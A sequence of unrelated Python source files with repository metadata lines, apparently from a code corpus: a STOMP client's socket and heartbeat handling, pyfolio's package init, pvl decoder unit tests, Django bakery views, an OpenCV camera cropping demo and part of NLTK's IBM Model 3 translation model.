raise KeyError("Command %s requires one of the following headers: %s" % (command, str(required_header_key)))
elif not required_header_key in headers.keys():
raise KeyError("Command %s requires header %r" % (command, required_header_key))
self.__send_frame(command, headers, payload)
def __send_frame(self, command, headers={}, payload=''):
"""
Send a STOMP frame.
\param command
the frame command
\param headers
a map of headers (key-val pairs)
\param payload
the message payload
"""
if type(payload) == dict:
headers["transformation"] = "jms-map-xml"
payload = self.__convert_dict(payload)
if payload:
payload = encode(payload)
if hasbyte(0, payload):
headers.update({'content-length': len(payload)})
if self.__socket is not None:
try:
frame = [ ]
if command is not None:
frame.append(command + '\n')
for key, val in headers.items():
frame.append('%s:%s\n' % (key, val))
frame.append('\n')
if payload:
frame.append(payload)
if command is not None:
# only send the terminator if we're sending a command (heartbeats have no term)
frame.append(NULL)
frame = pack(frame)
self.__socket_semaphore.acquire()
try:
socksend(self.__socket, frame)
log.debug("Sent frame: type=%s, headers=%r, body=%r" % (command, headers, payload))
finally:
self.__socket_semaphore.release()
except Exception:
_, e, _ = sys.exc_info()
log.error("Error sending frame: %s" % e)
raise e
else:
raise exception.NotConnectedException()
def __notify(self, frame_type, headers=None, body=None):
"""
Utility function for notifying listeners of incoming and outgoing messages
\param frame_type
the type of message
\param headers
the map of headers associated with the message
\param body
the content of the message
"""
if frame_type == 'receipt':
# logic for wait-on-receipt notification
self.__send_wait_condition.acquire()
self.__send_wait_condition.notify()
self.__send_wait_condition.release()
receipt = headers['receipt-id']
self.__receipts[receipt] = None
# received a stomp 1.1 disconnect receipt
if receipt == self.__disconnect_receipt:
self.disconnect_socket()
if frame_type == 'connected':
self.connected = True
self.__connect_wait_condition.acquire()
self.__connect_wait_condition.notify()
self.__connect_wait_condition.release()
if 'version' not in headers.keys():
if self.version >= 1.1:
log.warn('Downgraded STOMP protocol version to 1.0')
self.version = 1.0
if 'heart-beat' in headers.keys():
self.heartbeats = utils.calculate_heartbeats(headers['heart-beat'].replace(' ', '').split(','), self.heartbeats)
if self.heartbeats != (0,0):
default_create_thread(self.__heartbeat_loop)
for listener in self.__listeners.values():
if not listener: continue
if not hasattr(listener, 'on_%s' % frame_type):
log.debug('listener %s has no method on_%s' % (listener, frame_type))
continue
if frame_type == 'connecting':
listener.on_connecting(self.__current_host_and_port)
continue
elif frame_type == 'disconnected':
self.connected = False
listener.on_disconnected()
continue
notify_func = getattr(listener, 'on_%s' % frame_type)
notify_func(headers, body)
def __receiver_loop(self):
"""
Main loop listening for incoming data.
"""
log.debug("Starting receiver loop")
try:
try:
while self.__running:
if self.__socket is None:
break
try:
try:
while self.__running:
frames = self.__read()
for frame in frames:
(frame_type, headers, body) = utils.parse_frame(frame)
log.debug("Received frame: %r, headers=%r, body=%r" % (frame_type, headers, body))
frame_type = frame_type.lower()
if frame_type in [ 'connected', 'message', 'receipt', 'error' ]:
self.__notify(frame_type, headers, body)
elif frame_type == 'heartbeat':
# no notifications needed
pass
else:
log.warning('Unknown response frame type: "%s" (frame length was %d)' % (frame_type, len(frame)))
finally:
try:
self.__socket.close()
except:
pass # ignore errors when attempting to close socket
self.__socket = None
self.__current_host_and_port = None
except exception.ConnectionClosedException:
if self.__running:
log.error("Lost connection")
self.__notify('disconnected')
#
# Clear out any half-received messages after losing connection
#
self.__recvbuf = ''
self.__running = False
break
except:
log.exception("An unhandled exception was encountered in the stomp receiver loop")
finally:
self.__receiver_thread_exit_condition.acquire()
self.__receiver_thread_exited = True
self.__receiver_thread_exit_condition.notifyAll()
self.__receiver_thread_exit_condition.release()
log.debug("Receiver loop ended")
def __heartbeat_loop(self):
"""
Loop for sending (and monitoring received) heartbeats
"""
send_sleep = self.heartbeats[0] / 1000
# receive gets an additional threshold of 3 additional seconds
receive_sleep = (self.heartbeats[1] / 1000) + 3
if send_sleep == 0:
sleep_time = receive_sleep
elif receive_sleep == 0:
sleep_time = send_sleep
else:
# sleep is the GCD of the send and receive times
sleep_time = gcd(send_sleep, receive_sleep) / 2
send_time = time.time()
receive_time = time.time()
while self.__running:
time.sleep(sleep_time)
if time.time() - send_time > send_sleep:
send_time = time.time()
log.debug('Sending a heartbeat message')
self.__send_frame(None)
if time.time() - receive_time > receive_sleep:
if time.time() - self.__received_heartbeat > receive_sleep:
log.debug('Heartbeat timeout')
# heartbeat timeout
for listener in self.__listeners.values():
listener.on_heartbeat_timeout()
self.disconnect_socket()
self.connected = False
def __read(self):
"""
Read the next frame(s) from the socket.
"""
fastbuf = StringIO()
while self.__running:
try:
c = self.__socket.recv(1024)
c = decode(c)
# reset the heartbeat for any received message
self.__received_heartbeat = time.time()
except Exception:
_, e, _ = sys.exc_info()
c = ''
if len(c) == 0:
raise exception.ConnectionClosedException()
fastbuf.write(c)
if '\x00' in c:
break
elif c == '\x0a':
# heartbeat (special case)
return c
self.__recvbuf += fastbuf.getvalue()
fastbuf.close()
result = []
if len(self.__recvbuf) > 0 and self.__running:
while True:
pos = self.__recvbuf.find('\x00')
if pos >= 0:
frame = self.__recvbuf[0:pos]
preamble_end = frame.find('\n\n')
if preamble_end >= 0:
content_length_match = Connection.__content_length_re.search(frame[0:preamble_end])
if content_length_match:
content_length = int(content_length_match.group('value'))
content_offset = preamble_end + 2
frame_size = content_offset + content_length
if frame_size > len(frame):
#
# Frame contains NUL bytes, need to read more
#
if frame_size < len(self.__recvbuf):
pos = frame_size
frame = self.__recvbuf[0:pos]
else:
#
# Haven't read enough data yet, exit loop and wait for more to arrive
#
break
result.append(frame)
self.__recvbuf = self.__recvbuf[pos+1:]
else:
break
return result
def __enable_keepalive(self):
def try_setsockopt(sock, name, fam, opt, val):
if val is None:
return True # no value to set always works
try:
sock.setsockopt(fam, opt, val)
log.debug('keepalive: set %r option to %r on socket' % (name, val))
except:
log.error('keepalive: unable to set %r option to %r on socket' % (name,val))
return False
return True
ka = self.__keepalive
if not ka:
return
if ka == True:
ka_sig = 'auto'
ka_args = ()
else:
try:
ka_sig = ka[0]
ka_args = ka[1:]
except Exception:
log.error('keepalive: bad specification %r' % (ka,))
return
if ka_sig == 'auto':
if LINUX_KEEPALIVE_AVAIL:
ka_sig = 'linux'
ka_args = None
log.debug('keepalive: autodetected linux-style support')
else:
log.error('keepalive: unable to detect any implementation, DISABLED!')
return
if ka_sig == 'linux':
log.debug('keepalive: activating linux-style support')
if ka_args is None:
log.debug('keepalive: using system defaults')
ka_args = (None, None, None)
lka_idle, lka_intvl, lka_cnt = ka_args
if try_setsockopt(self.__socket, 'enable', SOL_SOCKET, SO_KEEPALIVE, 1):
try_setsockopt(self.__socket, 'idle time', SOL_TCP, TCP_KEEPIDLE, lka_idle)
try_setsockopt(self.__socket, 'interval', SOL_TCP, TCP_KEEPINTVL, lka_intvl)
try_setsockopt(self.__socket, 'count', SOL_TCP, TCP_KEEPCNT, lka_cnt)
else:
log.error('keepalive: implementation %r not recognized or not supported' % ka_sig)
def __attempt_connection(self):
"""
Try connecting to the (host, port) tuples specified at construction time.
"""
sleep_exp = 1
connect_count = 0
while self.__running and self.__socket is None and connect_count < self.__reconnect_attempts_max:
for host_and_port in self.__host_and_ports:
try:
log.debug("Attempting connection to host %s, port %s" % host_and_port)
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__enable_keepalive()
if self.__ssl: # wrap socket
if self.__ssl_ca_certs:
cert_validation = ssl.CERT_REQUIRED
else:
cert_validation = ssl.CERT_NONE
self.__socket = ssl.wrap_socket(self.__socket, keyfile = self.__ssl_key_file,
certfile = self.__ssl_cert_file, cert_reqs = cert_validation,
ca_certs = self.__ssl_ca_certs, ssl_version = self.__ssl_version)
self.__socket.settimeout(self.__timeout)
if self.blocking is not None:
self.__socket.setblocking(self.blocking)
self.__socket.connect(host_and_port)
#
# Validate server cert
#
if self.__ssl and self.__ssl_cert_validator:
cert = self.__socket.getpeercert()
(ok, errmsg) = apply(self.__ssl_cert_validator, (cert, host_and_port[0]))
if not ok:
raise SSLError("Server certificate validation failed: %s" % errmsg)
self.__current_host_and_port = host_and_port
log.info("Established connection to host %s, port %s" % host_and_port)
break
except socket.error:
self.__socket = None
if isinstance(sys.exc_info()[1], tuple):
exc = sys.exc_info()[1][1]
else:
exc = sys.exc_info()[1]
connect_count += 1
log.warning("Could not connect to host %s, port %s: %s" % (host_and_port[0], host_and_port[1], exc))
if self.__socket is None:
sleep_duration = (min(self.__reconnect_sleep_max,
((self.__reconnect_sleep_initial / (1.0 + self.__reconnect_sleep_increase))
* math.pow(1.0 + self.__reconnect_sleep_increase, sleep_exp)))
* (1.0 + random.random() * self.__reconnect_sleep_jitter))
sleep_end = time.time() + sleep_duration
log.debug("Sleeping for %.1f seconds before attempting reconnect" % sleep_duration)
while self.__running and time.time() < sleep_end:
time.sleep(0.2)
if sleep_duration < self.__reconnect_sleep_max:
sleep_exp += 1
if not self.__socket:
raise exception.ConnectFailedException()
def default_create_thread(callback):
"""
Default thread creation
"""
thread = threading.Thread(None, callback)
thread.daemon = True # Don't let receiver thread prevent termination
thread.start()
return thread
| StratusLab/client | api/code/src/main/python/stomp/connect.py | Python | apache-2.0 | 37,671 | 0.007884 |
import warnings
from . import utils
from . import timeseries
from . import pos
from . import txn
from .tears import * # noqa
from .plotting import * # noqa
try:
from . import bayesian
except ImportError:
warnings.warn(
"Could not import bayesian submodule due to missing pymc3 dependency.",
ImportWarning)
__version__ = '0.1'
__all__ = ['utils', 'timeseries', 'pos', 'txn', 'bayesian']
| dursk/pyfolio | pyfolio/__init__.py | Python | apache-2.0 | 416 | 0 |
#!/usr/bin/env python
"""This module has tests for the pvl decoder functions."""
# Copyright 2019-2021, Ross A. Beyer ([email protected])
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import itertools
import unittest
from decimal import Decimal
from pvl.decoder import PVLDecoder, ODLDecoder, PDSLabelDecoder, for_try_except
from pvl.collections import Quantity
class TestForTryExcept(unittest.TestCase):
def test_for_try_except(self):
self.assertEqual(
5, for_try_except(ValueError, int, ("frank", "7.7", "5"))
)
self.assertRaises(
ValueError, for_try_except, ValueError, int, ("frank", "7.7", "a")
)
self.assertEqual(
datetime.date(2001, 1, 1),
for_try_except(
ValueError,
datetime.datetime.strptime,
itertools.repeat("2001-001"),
("%Y-%m-%d", "%Y-%j"),
).date(),
)
class TestDecoder(unittest.TestCase):
def setUp(self):
self.d = PVLDecoder()
def test_decode_quoted_string(self):
self.assertEqual("Quoted", self.d.decode_quoted_string('"Quoted"'))
self.assertEqual(
'He said, "hello"',
self.d.decode_quoted_string("""'He said, "hello"'"""),
)
self.assertEqual(
'She said, \\"bye\\"',
self.d.decode_quoted_string(r"'She said, \"bye\"'"),
)
self.assertEqual(
"No\\tin Python", self.d.decode_quoted_string(r"'No\tin Python'")
)
self.assertEqual(
"Line -\n Continued",
self.d.decode_quoted_string("'Line -\n Continued'"),
)
# print(self.d.decode_quoted_string("""'mixed"\\'quotes'"""))
def test_decode_unquoted_string(self):
self.assertEqual("Unquoted", self.d.decode_unquoted_string("Unquoted"))
for s in (
'hhhhh"hello"',
"Reserved=",
"No\tin Python",
"Line -\n Continued",
):
with self.subTest(string=s):
self.assertRaises(ValueError, self.d.decode_unquoted_string, s)
def test_decode_decimal(self):
for p in (
("125", 125),
("+211109", 211109),
("-79", -79),
("69.35", 69.35),
("+12456.345", 12456.345), # Integers
("-0.23456", -0.23456),
(".05", 0.05),
("-7.", -7), # Floating
("-2.345678E12", -2345678000000.0),
("1.567E-10", 1.567e-10),
("+4.99E+3", 4990.0),
): # Exponential
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_decimal(p[0]))
for s in ("2#0101#", "frank"):
with self.subTest(string=s):
self.assertRaises(ValueError, self.d.decode_decimal, s)
def test_decode_withDecimal(self):
d = PVLDecoder(real_cls=Decimal)
s = "123.450"
self.assertEqual(d.decode_decimal(s), Decimal(s))
self.assertRaises(ValueError, d.decode_decimal, "fruit")
def test_decode_non_decimal(self):
for p in (
("2#0101#", 5),
("+2#0101#", 5),
("-2#0101#", -5), # Binary
("8#0107#", 71),
("+8#0156#", 110),
("-8#0134#", -92), # Oct
("16#100A#", 4106),
("+16#23Bc#", 9148),
("-16#98ef#", -39151),
): # Hex
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_non_decimal(p[0]))
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("2001-01-01", datetime.date(2001, 1, 1)),
("2001-027", datetime.date(2001, 1, 27)),
("2001-027Z", datetime.date(2001, 1, 27)),
("23:45", datetime.time(23, 45, tzinfo=utc)),
("01:42:57", datetime.time(1, 42, 57, tzinfo=utc)),
("12:34:56.789", datetime.time(12, 34, 56, 789000, tzinfo=utc)),
(
"2001-027T23:45",
datetime.datetime(2001, 1, 27, 23, 45, tzinfo=utc),
),
(
"2001-01-01T01:34Z",
datetime.datetime(2001, 1, 1, 1, 34, tzinfo=utc),
),
("01:42:57Z", datetime.time(1, 42, 57, tzinfo=utc)),
("2001-12-31T01:59:60.123Z", "2001-12-31T01:59:60.123Z"),
("2001-12-31T01:59:60.123456789", "2001-12-31T01:59:60.123456789"),
("01:00:60", "01:00:60"),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
self.assertRaises(ValueError, self.d.decode_datetime, "frank")
fancy = "2001-001T01:10:39+7"
self.assertRaises(ValueError, self.d.decode_datetime, fancy)
def test_decode_simple_value(self):
for p in (
("2001-01-01", datetime.date(2001, 1, 1)),
("2#0101#", 5),
("-79", -79),
("Unquoted", "Unquoted"),
('"Quoted"', "Quoted"),
("Null", None),
("TRUE", True),
("false", False),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_simple_value(p[0]))
def test_decode_quantity(self):
q = self.d.decode_quantity("15", "m/s")
self.assertEqual(q, Quantity("15", "m/s"))
try:
from astropy import units as u
d = PVLDecoder(quantity_cls=u.Quantity)
q = d.decode_quantity("15", "m/s")
self.assertEqual(q, u.Quantity("15", "m/s"))
except ImportError: # astropy isn't available.
pass
try:
from pint import Quantity as pintquant
d = PVLDecoder(quantity_cls=pintquant)
q = d.decode_quantity("15", "m/s")
self.assertEqual(q, pintquant("15", "m/s"))
except ImportError: # pint isn't available.
pass
class TestODLDecoder(unittest.TestCase):
def setUp(self):
self.d = ODLDecoder()
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("1990-07-04", datetime.date(1990, 7, 4)),
("1990-158", datetime.date(1990, 6, 7)),
("2001-001", datetime.date(2001, 1, 1)),
("2001-01-01", datetime.date(2001, 1, 1)),
("12:00", datetime.time(12)),
("12:00:45", datetime.time(12, 0, 45)),
(
"12:00:45.4571",
datetime.time(12, 0, 45, 457100),
),
("15:24:12Z", datetime.time(15, 24, 12, tzinfo=utc)),
("1990-07-04T12:00", datetime.datetime(1990, 7, 4, 12)),
(
"1990-158T15:24:12Z",
datetime.datetime(1990, 6, 7, 15, 24, 12, tzinfo=utc),
),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
self.assertRaises(ValueError, self.d.decode_datetime, "01:00:60")
try:
from dateutil import tz
tz_plus_7 = tz.tzoffset("+7", datetime.timedelta(hours=7))
for p in (
("01:12:22+07", datetime.time(1, 12, 22, tzinfo=tz_plus_7)),
("01:12:22+7", datetime.time(1, 12, 22, tzinfo=tz_plus_7)),
(
"01:10:39.4575+07",
datetime.time(1, 10, 39, 457500, tzinfo=tz_plus_7),
),
(
"2001-001T01:10:39+7",
datetime.datetime(2001, 1, 1, 1, 10, 39, tzinfo=tz_plus_7),
),
(
"2001-001T01:10:39.457591+7",
datetime.datetime(
2001, 1, 1, 1, 10, 39, 457591, tzinfo=tz_plus_7
),
),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
except ImportError: # dateutil isn't available.
pass
class TestPDS3Decoder(unittest.TestCase):
def setUp(self):
self.d = PDSLabelDecoder()
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("1990-07-04", datetime.date(1990, 7, 4)),
("1990-158", datetime.date(1990, 6, 7)),
("2001-001", datetime.date(2001, 1, 1)),
("2001-01-01", datetime.date(2001, 1, 1)),
("12:00", datetime.time(12, tzinfo=utc)),
("12:00:45", datetime.time(12, 0, 45, tzinfo=utc)),
("15:24:12Z", datetime.time(15, 24, 12, tzinfo=utc)),
(
"1990-158T15:24:12Z",
datetime.datetime(1990, 6, 7, 15, 24, 12, tzinfo=utc)),
(
"12:00:45.457",
datetime.time(12, 0, 45, 457000, tzinfo=utc),
),
(
"1990-07-04T12:00",
datetime.datetime(1990, 7, 4, 12, tzinfo=utc),
),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
for t in (
"01:12:22+07",
"01:12:22+7",
"01:10:39.4575+07",
"2001-001T01:10:39+7",
"2001-001T01:10:39.457591+7",
"2001-001T01:10:39.457591",
):
with self.subTest(time=t):
self.assertRaises(ValueError, self.d.decode_datetime, t)
| planetarypy/pvl | tests/test_decoder.py | Python | bsd-3-clause | 10,166 | 0 |
from django.core.urlresolvers import reverse
from bakery.views import BuildableDetailView, BuildableListView
from core.views import get_build_path
from .models import BirthCertificate
class ListView(BuildableListView):
def __init__(self, **kwargs):
super(ListView, self).__init__(**kwargs)
ListView.build_path = get_build_path('bcs:list', 'index.html')
template_name = 'bcs/list.html'
context_object_name = 'list'
def get_queryset(self):
""" Return the documents ordered by location name"""
return BirthCertificate.objects.order_by('location')
class DetailView(BuildableDetailView):
model = BirthCertificate
template_name = 'bcs/detail.html'
context_object_name = 'bc'
def get_url(self, obj):
return reverse('bcs:detail', kwargs={'pk': obj.pk})
| ginabythebay/iddocs | bcs/views.py | Python | apache-2.0 | 827 | 0 |
import numpy
import cv2
import time
print "Starting demo"
frameTimerDuration = 1
# This is the desired resolution of the Pi camera
resolution = (320, 240)
# This is the desired maximum framerate, 0 for maximum possible throughput
framerate = 0
# These are the resolution of the output display, set these
displayWidth = 32.0
displayHeight = 16.0
# These are the horizontal margins of the input feed to crop, everything else scales to fit these
xLeft = 150
xRight = 150
# Open cam, decode image, show in window
cap = cv2.VideoCapture(0) # use 1 or 2 or ... for other camera
success, img = cap.read()
resolution = (len(img[0]), len(img))
print "input resolution is %d,%d" % resolution
print "target resolution is %d,%d" % (displayWidth, displayHeight)
cv2.namedWindow("Original")
cv2.namedWindow("Cropped")
cv2.namedWindow("Downsampled")
cv2.namedWindow("Equalized")
cv2.namedWindow("Contrast")
_displayAspectRatio = displayHeight / displayWidth
print "aspect ratio %f" % _displayAspectRatio
_xMin = xLeft
_xMax = resolution[0]-xRight
_width = _xMax+1 - _xMin
_height = int(_displayAspectRatio * _width)
_yMin = int((resolution[1] - _height)/2)
_yMax = _yMin + _height
print "min = %d, max = %d, height = %d" % (_yMin, _yMax, _height)
downsampleXFactor = displayWidth / _width
downsampleYFactor = displayHeight / _height
print "Crop to (%d,%d)=%d:(%d,%d)=%d" % (_xMin,_xMax,(_xMax-_xMin),_yMin,_yMax,(_yMax-_yMin))
print "Scaling by (x,y) %f, %f" % (downsampleXFactor, downsampleYFactor)
print "Scales to (%d,%d)" % (_width*downsampleXFactor,_height*downsampleYFactor)
def get_brightness(img):
hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
averageBrightness = int(cv2.mean(hsv[:,:,2])[0])
return bytearray(format(averageBrightness,'05d'))
def equalize_brightness(img):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv[:,:,2] = cv2.equalizeHist(hsv[:,:,2])
img = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return img
def equalize_hist(img):
for c in xrange(0, 2):
img[:,:,c] = cv2.equalizeHist(img[:,:,c])
return img
frameTimer = time.time() + frameTimerDuration
frameCounter = 0
try:
key = -1
while(key < 0):
success, img = cap.read()
frameCounter += 1
if time.time() > frameTimer:
print "processed %d frames in %f seconds" % (frameCounter, frameTimerDuration)
frameCounter = 0
frameTimer = time.time() + frameTimerDuration
brightness = get_brightness(img)
print "Brightness " + brightness
cropImg = img[_yMin:_yMax,_xMin:_xMax]
smallImg = cv2.resize(cropImg, (0,0), fx=downsampleXFactor, fy=downsampleYFactor)
equalizedImg = numpy.copy(cropImg)
contrastImg = numpy.copy(cropImg)
equalize_hist(equalizedImg)
contrastImg = equalize_brightness(contrastImg)
cv2.imshow("Original", img)
cv2.imshow("Cropped", cropImg)
cv2.imshow("Downsampled", smallImg)
cv2.imshow("Equalized", equalizedImg)
cv2.imshow("Contrast", contrastImg)
key = cv2.waitKey(1)
except KeyboardInterrupt as e:
print "Interrupted"
stream.close()
cap.close()
camera.close()
cv2.destroyAllWindows()
| raygeeknyc/skinner | frameprocessordemo.py | Python | gpl-3.0 | 3,056 | 0.017997 |
# -*- coding: utf-8 -*-
# Natural Language Toolkit: IBM Model 3
#
# Copyright (C) 2001-2013 NLTK Project
# Authors: Chin Yee Lee, Hengfeng Li, Ruxin Hou, Calvin Tanujaya Lim
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Translation model that considers how a word can be aligned to
multiple words in another language.
IBM Model 3 improves on Model 2 by directly modeling the phenomenon
where a word in one language may be translated into zero or more words
in another. This is expressed by the fertility probability,
n(phi | source word).
If a source word translates into more than one word, it is possible to
generate sentences that have the same alignment in multiple ways. This
is modeled by a distortion step. The distortion probability, d(j|i,l,m),
predicts a target word position, given its aligned source word's
position. The distortion probability replaces the alignment probability
of Model 2.
The fertility probability is not applicable for NULL. Target words that
align to NULL are assumed to be distributed uniformly in the target
sentence. The existence of these words is modeled by p1, the probability
that a target word produced by a real source word requires another
target word that is produced by NULL.
The EM algorithm used in Model 3 is:
E step - In the training data, collect counts, weighted by prior
probabilities.
(a) count how many times a source language word is translated
into a target language word
(b) count how many times a particular position in the target
sentence is aligned to a particular position in the source
sentence
(c) count how many times a source word is aligned to phi number
of target words
(d) count how many times NULL is aligned to a target word
M step - Estimate new probabilities based on the counts from the E step
Because there are too many possible alignments, only the most probable
ones are considered. First, the best alignment is determined using prior
probabilities. Then, a hill climbing approach is used to find other good
candidates.
Notations:
i: Position in the source sentence
Valid values are 0 (for NULL), 1, 2, ..., length of source sentence
j: Position in the target sentence
Valid values are 1, 2, ..., length of target sentence
l: Number of words in the source sentence, excluding NULL
m: Number of words in the target sentence
s: A word in the source language
t: A word in the target language
phi: Fertility, the number of target words produced by a source word
p1: Probability that a target word produced by a source word is
accompanied by another target word that is aligned to NULL
p0: 1 - p1
References:
Philipp Koehn. 2010. Statistical Machine Translation.
Cambridge University Press, New York.
Peter E Brown, Stephen A. Della Pietra, Vincent J. Della Pietra, and
Robert L. Mercer. 1993. The Mathematics of Statistical Machine
Translation: Parameter Estimation. Computational Linguistics, 19 (2),
263-311.
"""
from __future__ import division
from collections import defaultdict
from math import factorial
from nltk.translate import AlignedSent
from nltk.translate import Alignment
from nltk.translate import IBMModel
from nltk.translate import IBMModel2
from nltk.translate.ibm_model import Counts
import warnings
class IBMModel3(IBMModel):
"""
Translation model that considers how a word can be aligned to
multiple words in another language
>>> bitext = []
>>> bitext.append(AlignedSent(['klein', 'ist', 'das', 'haus'], ['the', 'house', 'is', 'small']))
>>> bitext.append(AlignedSent(['das', 'haus', 'war', 'ja', 'groß'], ['the', 'house', 'was', 'big']))
>>> bitext.append(AlignedSent(['das', 'buch', 'ist', 'ja', 'klein'], ['the', 'book', 'is', 'small']))
>>> bitext.append(AlignedSent(['ein', 'haus', 'ist', 'klein'], ['a', 'house', 'is', 'small']))
>>> bitext.append(AlignedSent(['das', 'haus'], ['the', 'house']))
>>> bitext.append(AlignedSent(['das', 'buch'], ['the', 'book']))
>>> bitext.append(AlignedSent(['ein', 'buch'], ['a', 'book']))
>>> bitext.append(AlignedSent(['ich', 'fasse', 'das', 'buch', 'zusammen'], ['i', 'summarize', 'the', 'book']))
>>> bitext.append(AlignedSent(['fasse', 'zusammen'], ['summarize']))
>>> ibm3 = IBMModel3(bitext, 5)
>>> print(round(ibm3.translation_table['buch']['book'], 3))
1.0
>>> print(round(ibm3.translation_table['das']['book'], 3))
0.0
>>> print(round(ibm3.translation_table['ja'][None], 3))
1.0
>>> print(round(ibm3.distortion_table[1][1][2][2], 3))
1.0
>>> print(round(ibm3.distortion_table[1][2][2][2], 3))
0.0
>>> print(round(ibm3.distortion_table[2][2][4][5], 3))
0.75
>>> print(round(ibm3.fertility_table[2]['summarize'], 3))
1.0
>>> print(round(ibm3.fertility_table[1]['book'], 3))
1.0
>>> print(ibm3.p1)
0.054...
>>> test_sentence = bitext[2]
>>> test_sentence.words
['das', 'buch', 'ist', 'ja', 'klein']
>>> test_sentence.mots
['the', 'book', 'is', 'small']
>>> test_sentence.alignment
Alignment([(0, 0), (1, 1), (2, 2), (3, None), (4, 3)])
"""
def __init__(self, sentence_aligned_corpus, iterations,
probability_tables=None):
"""
Train on ``sentence_aligned_corpus`` and create a lexical
translation model, a distortion model, a fertility model, and a
model for generating NULL-aligned words.
Translation direction is from ``AlignedSent.mots`` to
``AlignedSent.words``.
:param sentence_aligned_corpus: Sentence-aligned parallel corpus
:type sentence_aligned_corpus: list(AlignedSent)
:param iterations: Number of iterations to run training algorithm
:type iterations: int
:param probability_tables: Optional. Use this to pass in custom
probability values. If not specified, probabilities will be
set to a uniform distribution, or some other sensible value.
If specified, all the following entries must be present:
``translation_table``, ``alignment_table``,
``fertility_table``, ``p1``, ``distortion_table``.
See ``IBMModel`` for the type and purpose of these tables.
:type probability_tables: dict[str]: object
"""
super(IBMModel3, self).__init__(sentence_aligned_corpus)
self.reset_probabilities()
if probability_tables is None:
# Get translation and alignment probabilities from IBM Model 2
ibm2 = IBMModel2(sentence_aligned_corpus, iterations)
self.translation_table = ibm2.translation_table
self.alignment_table = ibm2.alignment_table
self.set_uniform_probabilities(sentence_aligned_corpus)
else:
# Set user-defined probabilities
self.translation_table = probability_tables['translation_table']
self.alignment_table = probability_tables['alignment_table']
self.fertility_table = probability_tables['fertility_table']
self.p1 = probability_tables['p1']
self.distortion_table = probability_tables['distortion_table']
for n in range(0, iterations):
self.train(sentence_aligned_corpus)
def reset_probabilities(self):
super(IBMModel3, self).reset_probabilities()
self.distortion_table = defaultdict(
lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(
lambda: self.MIN_PROB))))
"""
dict[int][int][int][int]: float. Probability(j | i,l,m).
Values accessed as ``distortion_table[j][i][l][m]``.
"""
def set_uniform_probabilities(self, sentence_aligned_corpus):
# d(j | i,l,m) = 1 / m for all i, j, l, m
l_m_combinations = set()
for aligned_sentence in sentence_aligned_corpus:
l = len(aligned_sentence.mots)
m = len(aligned_sentence.words)
if (l, m) not in l_m_combinations:
l_m_combinations.add((l, m))
initial_prob = 1 / float(m)
if initial_prob < IBMModel.MIN_PROB:
warnings.warn("A target sentence is too long (" + str(m) +
" words). Results may be less accurate.")
for j in range(1, m + 1):
for i in range(0, l + 1):
self.distortion_table[j][i][l][m] = initial_prob
# simple initialization, taken from GIZA++
self.fertility_table[0] = defaultdict(lambda: 0.2)
self.fertility_table[1] = defaultdict(lambda: 0.65)
self.fertility_table[2] = defaultdict(lambda: 0.1)
self.fertility_table[3] = defaultdict(lambda: 0.04)
MAX_FERTILITY = 10
initial_fert_prob = 0.01 / (MAX_FERTILITY - 4)
for phi in range(4, MAX_FERTILITY):
self.fertility_table[phi] = defaultdict(lambda: initial_fert_prob)
self.p1 = 0.5
def train(self, parallel_corpus):
counts = Model3Counts()
for aligned_sentence in parallel_corpus:
l = len(aligned_sentence.mots)
m = len(aligned_sentence.words)
# Sample the alignment space
sampled_alignments, best_alignment = self.sample(aligned_sentence)
# Record the most probable alignment
aligned_sentence.alignment = Alignment(
best_alignment.zero_indexed_alignment())
# E step (a): Compute normalization factors to weigh counts
total_count = self.prob_of_alignments(sampled_alignments)
# E step (b): Collect counts
for alignment_info in sampled_alignments:
count = self.prob_t_a_given_s(alignment_info)
normalized_count = count / total_count
for j in range(1, m + 1):
counts.update_lexical_translation(
normalized_count, alignment_info, j)
counts.update_distortion(
normalized_count, alignment_info, j, l, m)
counts.update_null_generation(normalized_count, alignment_info)
counts.update_fertility(normalized_count, alignment_info)
# M step: Update probabilities with maximum likelihood estimates
# If any probability is less than MIN_PROB, clamp it to MIN_PROB
existing_alignment_table = self.alignment_table
self.reset_probabilities()
self.alignment_table = existing_alignment_table # don't retrain
self.maximize_lexical_translation_probabilities(counts)
self.maximize_distortion_probabilities(counts)
self.maximize_fertility_probabilities(counts)
self.maximize_null_generation_probabilities(counts)
def maximize_distortion_probabilities(self, counts):
MIN_PROB = IBMModel.MIN_PROB
for j, i_s in counts.distortion.items():
for i, src_sentence_lengths in i_s.items():
for l, trg_sentence_lengths in src_sentence_lengths.items():
for m in trg_sentence_lengths:
estimate = (counts.distortion[j][i][l][m] /
counts.distortion_for_any_j[i][l][m])
self.distortion_table[j][i][l][m] = max(estimate,
MIN_PROB)
def prob_t_a_given_s(self, alignment_info):
"""
Probability of target sentence and an alignment given the
source sentence
"""
src_sentence = alignment_info.src_sentence
trg_sentence = alignment_info.trg_sentence
l = len(src_sentence) - 1 # exclude NULL
m = len(trg_sentence) - 1
p1 = self.p1
p0 = 1 - p1
probability = 1.0
MIN_PROB = IBMModel.MIN_PROB
# Combine NULL insertion probability
null_fertility = alignment_info.fertility_of_i(0)
probability *= (pow(p1, null_fertility) *
pow(p0, m - 2 * null_fertility))
if probability < MIN_PROB:
